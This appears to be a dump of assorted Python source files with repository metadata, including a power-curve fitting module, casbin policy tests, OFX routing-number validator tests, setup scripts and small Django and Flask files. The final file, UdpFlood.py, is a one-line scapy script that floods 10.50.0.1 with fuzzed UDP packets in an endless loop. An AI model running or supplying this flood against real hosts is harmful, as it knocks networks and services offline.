16fe387adcc6ac34f4aa47c28bce52f595ac4279
|
[
"BSD-2-Clause"
] | null | null | null |
skg/pow.py
|
bluenote10/scikit-guess
|
16fe387adcc6ac34f4aa47c28bce52f595ac4279
|
[
"BSD-2-Clause"
] | null | null | null |
skg/pow.py
|
bluenote10/scikit-guess
|
16fe387adcc6ac34f4aa47c28bce52f595ac4279
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Power fit with additive bias.
.. todo::
Add proper handling of colinear inputs (and other singular matrix cases).
.. todo::
Add tests.
.. todo::
Add nan_policy argument.
"""
from future import division, absolute_import
from numpy import log, power
from .exp import exp_fit
__all__ = ['pow_fit']
def pow_fit(x, y, sorted=True):
"""
Fit a power curve to raveled 1D data.
The fitting parameters are comptued for:
.. math::
y = A + Bx^C
Parameters
----------
x : array-like
The x-values of the data points. The fit will be performed on a
raveled version of this array. All elements must be positive.
y : array-like
The y-values of the data points corresponding to `x`. Must be
the same size as `x`. The fit will be performed on a raveled
version of this array.
sorted : bool
Set to True if `x` is already monotonically increasing or
decreasing. If False, `x` will be sorted into increasing order,
and `y` will be sorted along with it.
Return
------
a, b, c : array
A 3-element array of optimized fitting parameters. The first
element is the additive bias, the second the multiplicative, and
the third is the power.
Notes
-----
``pow_fit(x, y, sorted)`` is equivalent to
``exp_fit(log(x), y, sorted)`` since
.. math::
A + Be^{Cx} = A + B(e^x)^C
References
----------
Jacquelin, Jean. "REGRESSIONS Et EQUATIONS INTEGRALES", pp. 15–18.,
Available online: https://www.scribd.com/doc/14674814/Regressions-et-equations-integrales
"""
return exp_fit(log(x), y, sorted)
def model(x, a, b, c):
"""
Compute
.. math::
y = A + Bx^C
Parameters
----------
x : array-like
The value of the model will be the same shape as the input.
a : float
The additive bias.
b : float
The multiplicative bias.
c : float
The power.
Return
------
y : array-like
An array of the same shape as ``x``, containing the model
computed for the given parameters.
"""
return a + b * power(x, c)
| 21.54902
| 93
| 0.595996
| 314
| 2,198
| 4.136943
| 0.398089
| 0.023095
| 0.024634
| 0.012317
| 0.204773
| 0.150885
| 0.124711
| 0.124711
| 0.124711
| 0.124711
| 0
| 0.009061
| 0.297088
| 2,198
| 101
| 94
| 21.762376
| 0.831068
| 0.77252
| 0
| 0
| 0
| 0
| 0.026415
| 0
| 0
| 0
| 0
| 0.029703
| 0
| 1
| 0.25
| false
| 0
| 0.375
| 0
| 0.875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
4a4d0d7410f5a033ee19b01330fb9d94da00963f
| 145
|
py
|
Python
|
tests/package/__init__.py
|
purmirl/ProbeArrow
|
7c2c7d0765130d61ccd0c998d0b305b660708d56
|
[
"BSD-3-Clause"
] | 5
|
2021-04-15T03:14:27.000Z
|
2021-11-11T06:38:49.000Z
|
tests/package/__init__.py
|
purmirl/TRACE-ROUTE
|
0a259a601d7b10c03bc4cb820ac2ce23dd6d9e37
|
[
"BSD-3-Clause"
] | 5
|
2021-01-16T12:52:15.000Z
|
2021-06-29T14:43:54.000Z
|
tests/package/__init__.py
|
purmirl/TRACE-ROUTE
|
0a259a601d7b10c03bc4cb820ac2ce23dd6d9e37
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Copyright 2020~ PeTrA. All rights reserved.
. Python Project Structure Repository;
"""
# PythonProjectStructure/tests/package/__init__.py;
| 24.166667
| 51
| 0.765517
| 15
| 145
| 7.133333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 0.117241
| 145
| 5
| 52
| 29
| 0.804688
| 0.917241
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a6696ec4c6465c5bb5ce278f1fe1750f3c4fb76
| 326
|
py
|
Python
|
setup.py
|
dilayercelik/gauss-bino-distributions-ercelik
|
d11eb3ef638e020fdf84188ea1a6f0222401c5b5
|
[
"MIT"
] | null | null | null |
setup.py
|
dilayercelik/gauss-bino-distributions-ercelik
|
d11eb3ef638e020fdf84188ea1a6f0222401c5b5
|
[
"MIT"
] | null | null | null |
setup.py
|
dilayercelik/gauss-bino-distributions-ercelik
|
d11eb3ef638e020fdf84188ea1a6f0222401c5b5
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(name = 'gauss_bino_distributions_ercelik',
version = '0.1',
description = 'Gaussian and Binomial distributions',
packages = ['gauss_bino_distributions_ercelik'],
author = 'Dilay Fidan Ercelik',
author_email = 'dilay.ercelik@gmail.com',
zip_safe = False)
| 32.6
| 58
| 0.693252
| 36
| 326
| 6.055556
| 0.722222
| 0.082569
| 0.201835
| 0.266055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007722
| 0.205521
| 326
| 9
| 59
| 36.222222
| 0.833977
| 0
| 0
| 0
| 0
| 0
| 0.441718
| 0.266871
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a6f893f263e04064a03a1c589cfb6b634d96a7b
| 756
|
py
|
Python
|
tests/test_file_manager.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
tests/test_file_manager.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
tests/test_file_manager.py
|
nleguillarme/inteGraph
|
65faae4b7c16977094c387f6359980a4e99f94cb
|
[
"Apache-2.0"
] | null | null | null |
import pytest
# from bkgb.utils.file_manager import *
# def test_decompress_gz():
# f_in = "test_data/dummy.gz"
# assert decompress_gz(f_in) != None
#
#
# def test_decompress_tar():
# f_in = "test_data/dummy.tar"
# assert decompress_tar(f_in) != None
#
#
# def test_decompress_file():
# f_in = "test_data/dummy.gz"
# assert decompress_file(f_in) != None
#
# f_in = "test_data/dummy.tar"
# assert decompress_file(f_in) != None
#
# f_in = "test_data/dummy.zip"
# with pytest.raises(NotImplementedError):
# decompress_file(f_in) != None
# def test_split_file():
# f_in = "test_data/test_split_file/test.nq"
# split_file(f_in, prefix="test_data/test_split_file/test.", max_size=10)
# assert True
| 24.387097
| 77
| 0.665344
| 112
| 756
| 4.142857
| 0.258929
| 0.077586
| 0.090517
| 0.142241
| 0.674569
| 0.590517
| 0.37931
| 0.37931
| 0.185345
| 0.185345
| 0
| 0.003284
| 0.194444
| 756
| 30
| 78
| 25.2
| 0.758621
| 0.90873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
4a8926526c2081a3e44adbbfbce1c64a42a24d9e
| 217
|
py
|
Python
|
src/custom_flask/custom_filter.py
|
kitoku-magic/python_library
|
a02df73bd60189c7ff679a5199854af7380cd720
|
[
"MIT"
] | null | null | null |
src/custom_flask/custom_filter.py
|
kitoku-magic/python_library
|
a02df73bd60189c7ff679a5199854af7380cd720
|
[
"MIT"
] | null | null | null |
src/custom_flask/custom_filter.py
|
kitoku-magic/python_library
|
a02df73bd60189c7ff679a5199854af7380cd720
|
[
"MIT"
] | null | null | null |
from python_library.src import markupsafe
# テンプレートファイルから呼び出すfilter関数群
def nl2br(value):
"""
改行コードを、HTMLの改行に変換する
"""
value = value.__str__().replace('\n', '<br />')
return markupsafe.Markup(value)
| 21.7
| 51
| 0.677419
| 22
| 217
| 6.454545
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005618
| 0.179724
| 217
| 9
| 52
| 24.111111
| 0.792135
| 0.211982
| 0
| 0
| 0
| 0
| 0.051613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
4a8d08f15358d384cdbdcc7cfaaf1fe59560ed6d
| 5,178
|
py
|
Python
|
tests/model/test_policy.py
|
captt-g/pycasbin
|
f0775b4921420fec29da7bd242cb74f0b4971e32
|
[
"Apache-2.0"
] | null | null | null |
tests/model/test_policy.py
|
captt-g/pycasbin
|
f0775b4921420fec29da7bd242cb74f0b4971e32
|
[
"Apache-2.0"
] | null | null | null |
tests/model/test_policy.py
|
captt-g/pycasbin
|
f0775b4921420fec29da7bd242cb74f0b4971e32
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from casbin.model import Model
from tests.test_enforcer import get_examples
class TestPolicy(TestCase):
    """Unit tests for policy CRUD operations on casbin's Model."""

    def test_get_policy(self):
        """get_policy returns the list of rules stored under a section/key."""
        m = Model()
        m.load_model(get_examples("basic_model.conf"))
        rule = ['admin', 'domain1', 'data1', 'read']
        m.add_policy('p', 'p', rule)
        # assertEqual produces a readable diff on failure, unlike
        # assertTrue(a == b) which only reports "False is not true".
        self.assertEqual(m.get_policy('p', 'p'), [rule])

    def test_has_policy(self):
        """has_policy finds a rule that was added."""
        m = Model()
        m.load_model(get_examples("basic_model.conf"))
        rule = ['admin', 'domain1', 'data1', 'read']
        m.add_policy('p', 'p', rule)
        self.assertTrue(m.has_policy('p', 'p', rule))

    def test_add_policy(self):
        """add_policy makes a previously absent rule visible."""
        m = Model()
        m.load_model(get_examples("basic_model.conf"))
        rule = ['admin', 'domain1', 'data1', 'read']
        self.assertFalse(m.has_policy('p', 'p', rule))
        m.add_policy('p', 'p', rule)
        self.assertTrue(m.has_policy('p', 'p', rule))

    def test_add_role_policy(self):
        """The 'p' and 'g' sections accumulate rules independently."""
        m = Model()
        m.load_model(get_examples("rbac_model.conf"))
        p_rule1 = ['alice', 'data1', 'read']
        m.add_policy('p', 'p', p_rule1)
        self.assertTrue(m.has_policy('p', 'p', p_rule1))
        p_rule2 = ['data2_admin', 'data2', 'read']
        m.add_policy('p', 'p', p_rule2)
        self.assertTrue(m.has_policy('p', 'p', p_rule2))
        g_rule = ['alice', 'data2_admin']
        m.add_policy('g', 'g', g_rule)
        self.assertTrue(m.has_policy('g', 'g', g_rule))
        # Policies are returned in insertion order.
        self.assertEqual(m.get_policy('p', 'p'), [p_rule1, p_rule2])
        self.assertEqual(m.get_policy('g', 'g'), [g_rule])

    def test_update_policy(self):
        """update_policy replaces an existing rule with a new one."""
        m = Model()
        m.load_model(get_examples("basic_model.conf"))
        old_rule = ['admin', 'domain1', 'data1', 'read']
        new_rule = ['admin', 'domain1', 'data2', 'read']
        m.add_policy('p', 'p', old_rule)
        self.assertTrue(m.has_policy('p', 'p', old_rule))
        m.update_policy('p', 'p', old_rule, new_rule)
        self.assertFalse(m.has_policy('p', 'p', old_rule))
        self.assertTrue(m.has_policy('p', 'p', new_rule))
        # Repeat against a model with explicit priorities.
        m = Model()
        m.load_model(get_examples("priority_model_explicit.conf"))
        old_rule = ['1', 'admin', 'data1', 'read', 'allow']
        new_rule = ['1', 'admin', 'data2', 'read', 'allow']
        m.add_policy('p', 'p', old_rule)
        self.assertTrue(m.has_policy('p', 'p', old_rule))
        m.update_policy('p', 'p', old_rule, new_rule)
        self.assertFalse(m.has_policy('p', 'p', old_rule))
        self.assertTrue(m.has_policy('p', 'p', new_rule))

    def test_update_policies(self):
        """update_policies replaces several rules in one call."""
        m = Model()
        m.load_model(get_examples("basic_model.conf"))
        old_rules = [['admin', 'domain1', 'data1', 'read'],
                     ['admin', 'domain1', 'data2', 'read'],
                     ['admin', 'domain1', 'data3', 'read']]
        new_rules = [['admin', 'domain1', 'data4', 'read'],
                     ['admin', 'domain1', 'data5', 'read'],
                     ['admin', 'domain1', 'data6', 'read']]
        m.add_policies('p', 'p', old_rules)
        for old_rule in old_rules:
            self.assertTrue(m.has_policy('p', 'p', old_rule))
        m.update_policies('p', 'p', old_rules, new_rules)
        for old_rule in old_rules:
            self.assertFalse(m.has_policy('p', 'p', old_rule))
        for new_rule in new_rules:
            self.assertTrue(m.has_policy('p', 'p', new_rule))
        # Repeat against a model with explicit priorities.
        m = Model()
        m.load_model(get_examples("priority_model_explicit.conf"))
        old_rules = [['1', 'admin', 'data1', 'read', 'allow'],
                     ['1', 'admin', 'data2', 'read', 'allow'],
                     ['1', 'admin', 'data3', 'read', 'allow']]
        new_rules = [['1', 'admin', 'data4', 'read', 'allow'],
                     ['1', 'admin', 'data5', 'read', 'allow'],
                     ['1', 'admin', 'data6', 'read', 'allow']]
        m.add_policies('p', 'p', old_rules)
        for old_rule in old_rules:
            self.assertTrue(m.has_policy('p', 'p', old_rule))
        m.update_policies('p', 'p', old_rules, new_rules)
        for old_rule in old_rules:
            self.assertFalse(m.has_policy('p', 'p', old_rule))
        for new_rule in new_rules:
            self.assertTrue(m.has_policy('p', 'p', new_rule))

    def test_remove_policy(self):
        """remove_policy deletes a rule and returns False once it is gone."""
        m = Model()
        m.load_model(get_examples("basic_model.conf"))
        rule = ['admin', 'domain1', 'data1', 'read']
        m.add_policy('p', 'p', rule)
        self.assertTrue(m.has_policy('p', 'p', rule))
        m.remove_policy('p', 'p', rule)
        self.assertFalse(m.has_policy('p', 'p', rule))
        # Removing an already-removed rule reports failure.
        self.assertFalse(m.remove_policy('p', 'p', rule))

    def test_remove_filtered_policy(self):
        """remove_filtered_policy matches field values starting at an index."""
        m = Model()
        m.load_model(get_examples("rbac_with_domains_model.conf"))
        rule = ['admin', 'domain1', 'data1', 'read']
        m.add_policy('p', 'p', rule)
        res = m.remove_filtered_policy('p', 'p', 1, 'domain1', 'data1')
        self.assertTrue(res)
        # A second removal of the same filter finds nothing.
        res = m.remove_filtered_policy('p', 'p', 1, 'domain1', 'data1')
        self.assertFalse(res)
| 33.843137
| 71
| 0.549633
| 688
| 5,178
| 3.90843
| 0.082849
| 0.03347
| 0.107103
| 0.077724
| 0.802529
| 0.746374
| 0.729639
| 0.692079
| 0.618446
| 0.618446
| 0
| 0.015625
| 0.258401
| 5,178
| 152
| 72
| 34.065789
| 0.684635
| 0
| 0
| 0.570093
| 0
| 0
| 0.152182
| 0.016222
| 0
| 0
| 0
| 0
| 0.242991
| 1
| 0.074766
| false
| 0
| 0.028037
| 0
| 0.11215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a90e1faecd5e8cce8ff42696cc3267eb34046ed
| 5,459
|
py
|
Python
|
test/ofx_validators.py
|
arda2525/fixofx
|
1792d94697af682ca1d4a75cfefe98465d95a288
|
[
"Apache-2.0"
] | 50
|
2015-01-01T00:14:04.000Z
|
2020-11-26T04:44:30.000Z
|
test/ofx_validators.py
|
arda2525/fixofx
|
1792d94697af682ca1d4a75cfefe98465d95a288
|
[
"Apache-2.0"
] | 3
|
2016-01-31T17:14:41.000Z
|
2017-03-01T13:36:17.000Z
|
test/ofx_validators.py
|
arda2525/fixofx
|
1792d94697af682ca1d4a75cfefe98465d95a288
|
[
"Apache-2.0"
] | 15
|
2015-10-29T09:04:21.000Z
|
2022-01-19T17:33:25.000Z
|
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../3rdparty')
sys.path.insert(0, '../lib')
import ofx
import unittest
class ValidatorTests(unittest.TestCase):
    """Tests for ofx.RoutingNumber validity, type, and region lookups."""

    # (two-digit ABA prefix, expected type, expected region); every test
    # number below is the prefix followed by the arbitrary filler "1234567".
    # Collapsing the copy-pasted assertEqual calls into one table keeps the
    # type and region expectations for each prefix side by side.
    ABA_CASES = [
        ("00", "United States Government", "United States Government"),
        ("01", "Primary", "Boston"),
        ("07", "Primary", "Chicago"),
        ("12", "Primary", "San Francisco"),
        ("13", None, None),
        ("20", None, None),
        ("21", "Thrift", "Boston"),
        ("25", "Thrift", "Richmond"),
        ("32", "Thrift", "San Francisco"),
        ("33", None, None),
        ("60", None, None),
        ("61", "Electronic", "Boston"),
        ("64", "Electronic", "Cleveland"),
        ("72", "Electronic", "San Francisco"),
        ("73", None, None),
        ("79", None, None),
        ("80", "Traveller's Cheque", "Traveller's Cheque"),
        ("81", None, None),
    ]

    def setUp(self):
        self.good_aba = ofx.RoutingNumber("314074269")
        self.bad_aba = ofx.RoutingNumber("123456789")

    def test_not_a_number(self):
        """A non-numeric routing number is invalid with no type or region."""
        nan = ofx.RoutingNumber("123abd")
        self.assertEqual(nan.is_valid(), False)
        self.assertEqual(nan.get_type(), None)
        self.assertEqual(nan.get_region(), None)
        self.assertEqual(str(nan),
                         "123abd (valid: False; type: None; region: None)")

    def test_valid_aba(self):
        """Checksum validation accepts a real ABA number, rejects a bad one."""
        self.assertEqual(self.good_aba.is_valid(), True)
        self.assertEqual(self.bad_aba.is_valid(), False)

    def test_aba_types(self):
        """Each ABA prefix maps to the expected institution type."""
        for prefix, expected_type, _expected_region in self.ABA_CASES:
            number = prefix + "1234567"
            # msg=number identifies the failing prefix in the report.
            self.assertEqual(ofx.RoutingNumber(number).get_type(),
                             expected_type, msg=number)

    def test_aba_regions(self):
        """Each ABA prefix maps to the expected Federal Reserve region."""
        for prefix, _expected_type, expected_region in self.ABA_CASES:
            number = prefix + "1234567"
            self.assertEqual(ofx.RoutingNumber(number).get_region(),
                             expected_region, msg=number)

    def test_aba_string(self):
        """str() reports the number, validity, type, and region."""
        self.assertEqual(str(self.good_aba),
                         "314074269 (valid: True; type: Thrift; region: Dallas)")
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| 44.745902
| 81
| 0.574831
| 518
| 5,459
| 5.932432
| 0.264479
| 0.209893
| 0.210869
| 0.363163
| 0.64725
| 0.629678
| 0.543768
| 0.131468
| 0.080703
| 0
| 0
| 0.09805
| 0.305001
| 5,459
| 121
| 82
| 45.115702
| 0.711914
| 0.102033
| 0
| 0.336735
| 0
| 0
| 0.14464
| 0
| 0
| 0
| 0
| 0
| 0.438776
| 1
| 0.061224
| false
| 0
| 0.030612
| 0
| 0.102041
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4a9de91ebc2f5c5c49ecb34c4d4ed44e831e98c3
| 127
|
py
|
Python
|
codes_auto/1586.longest-subarray-of-1s-after-deleting-one-element.py
|
smartmark-pro/leetcode_record
|
6504b733d892a705571eb4eac836fb10e94e56db
|
[
"MIT"
] | null | null | null |
codes_auto/1586.longest-subarray-of-1s-after-deleting-one-element.py
|
smartmark-pro/leetcode_record
|
6504b733d892a705571eb4eac836fb10e94e56db
|
[
"MIT"
] | null | null | null |
codes_auto/1586.longest-subarray-of-1s-after-deleting-one-element.py
|
smartmark-pro/leetcode_record
|
6504b733d892a705571eb4eac836fb10e94e56db
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode.cn id=1586 lang=python3
#
# [1586] longest-subarray-of-1s-after-deleting-one-element
#
# NOTE(review): no solution was ever written here — the bare `None` below is
# a placeholder expression left by the leetcode tooling, not working code.
None
# @lc code=end
| 18.142857
| 58
| 0.716535
| 21
| 127
| 4.333333
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088496
| 0.110236
| 127
| 7
| 59
| 18.142857
| 0.716814
| 0.866142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4aa6229f74767879d85251735c51d8ab079625eb
| 1,114
|
py
|
Python
|
setup.py
|
sk1p/django-codemirror2
|
07a3236e3e2b730cf47a1c08e58017b7f2528a46
|
[
"MIT"
] | 22
|
2015-03-19T16:37:15.000Z
|
2021-02-24T08:42:07.000Z
|
setup.py
|
sk1p/django-codemirror2
|
07a3236e3e2b730cf47a1c08e58017b7f2528a46
|
[
"MIT"
] | 6
|
2015-07-07T09:59:05.000Z
|
2020-11-23T10:36:53.000Z
|
setup.py
|
sk1p/django-codemirror2
|
07a3236e3e2b730cf47a1c08e58017b7f2528a46
|
[
"MIT"
] | 4
|
2015-05-26T09:26:56.000Z
|
2017-03-01T10:43:22.000Z
|
from setuptools import setup
# Package metadata for django-codemirror2, consumed by setuptools.
setup(
    name="django-codemirror2",
    version="0.2.1.dev1",
    author_email="alex@gc-web.de",
    author="Alexander Clausen",
    url="https://github.com/sk1p/django-codemirror2",
    # Adjacent string literals concatenate into one description.
    description="Django widgets for replacing textareas with CodeMirror2,"
    " an in-browser code editor",
    # Trove classifiers advertised on PyPI.
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Framework :: Django',
        'Framework :: Django :: 1.8',
        'Framework :: Django :: 1.9',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: JavaScript',
        'Topic :: Text Editors',
    ],
    # Include non-Python package data files in built distributions.
    include_package_data=True,
    packages=[
        "codemirror2",
        "codemirror2.tests",
    ],
)
| 32.764706
| 74
| 0.585278
| 108
| 1,114
| 6.009259
| 0.62963
| 0.204931
| 0.231125
| 0.120185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028395
| 0.27289
| 1,114
| 33
| 75
| 33.757576
| 0.77284
| 0
| 0
| 0.0625
| 0
| 0
| 0.60772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4ab5c78709fe3304f074ebf6931f294a04838e51
| 93
|
py
|
Python
|
doc2mysql/apps.py
|
tututou/reportonlie_os
|
527a0325ef8b5a555566a1ca55414f88e9831884
|
[
"Apache-2.0"
] | null | null | null |
doc2mysql/apps.py
|
tututou/reportonlie_os
|
527a0325ef8b5a555566a1ca55414f88e9831884
|
[
"Apache-2.0"
] | null | null | null |
doc2mysql/apps.py
|
tututou/reportonlie_os
|
527a0325ef8b5a555566a1ca55414f88e9831884
|
[
"Apache-2.0"
] | null | null | null |
from django.apps import AppConfig
class Doc2MysqlConfig(AppConfig):
    """Django application configuration for the doc2mysql app."""

    # Label Django uses to identify this application.
    name = 'doc2mysql'
| 15.5
| 33
| 0.763441
| 10
| 93
| 7.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.16129
| 93
| 5
| 34
| 18.6
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
4358becf1740d8473654cc9222529da6126c1d03
| 221
|
py
|
Python
|
contact/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
contact/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
contact/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
from django.contrib import admin
from contact.models import Contact
# Register your models here.
# Expose the Contact model in the Django admin site at /admin/.
admin.site.register(Contact)
| 31.571429
| 93
| 0.791855
| 33
| 221
| 5.30303
| 0.69697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020833
| 0.131222
| 221
| 7
| 94
| 31.571429
| 0.890625
| 0.533937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
435aef1e2360b5219178c4652227ee7ca9e94133
| 334
|
py
|
Python
|
project/views.py
|
lowell-dev-club/live-flask-workshop
|
a57a3db79fd772a6676ad3bce1ff45e1a5c1c06d
|
[
"MIT"
] | null | null | null |
project/views.py
|
lowell-dev-club/live-flask-workshop
|
a57a3db79fd772a6676ad3bce1ff45e1a5c1c06d
|
[
"MIT"
] | null | null | null |
project/views.py
|
lowell-dev-club/live-flask-workshop
|
a57a3db79fd772a6676ad3bce1ff45e1a5c1c06d
|
[
"MIT"
] | null | null | null |
# Import Flask app object from project folder (For python this means from the __init__.py file)
from project import app
# Import functions from flask package
from flask import render_template
# Create new route at '/'
@app.route('/')
def home():
    """Serve the site root by rendering the file.html template."""
    # return the rendered version of file.html
    return render_template('file.html')
| 30.363636
| 95
| 0.751497
| 50
| 334
| 4.9
| 0.6
| 0.089796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170659
| 334
| 11
| 96
| 30.363636
| 0.884477
| 0.580838
| 0
| 0
| 0
| 0
| 0.073529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 4
|
436f3a14775b38a4e0058c1fdb39a3c69361719c
| 71
|
py
|
Python
|
UdpFlood.py
|
ep4sh/pyddos
|
95e86dbc3249f4ce9bb36c71663f0851d4db82cf
|
[
"MIT"
] | 15
|
2018-02-18T04:13:23.000Z
|
2022-03-10T18:24:36.000Z
|
UdpFlood.py
|
ep4sh/pyddos
|
95e86dbc3249f4ce9bb36c71663f0851d4db82cf
|
[
"MIT"
] | null | null | null |
UdpFlood.py
|
ep4sh/pyddos
|
95e86dbc3249f4ce9bb36c71663f0851d4db82cf
|
[
"MIT"
] | 7
|
2019-09-04T02:38:17.000Z
|
2022-02-10T07:00:26.000Z
|
from scapy.all import *
# NOTE(review): loop=1 makes scapy resend the fuzzed UDP packet indefinitely
# (a flood); the destination is hard-coded to 10.50.0.1.
send(IP(dst="10.50.0.1")/fuzz(UDP()),loop=1)
| 14.2
| 44
| 0.633803
| 15
| 71
| 3
| 0.933333
| 0
| 0
| 0
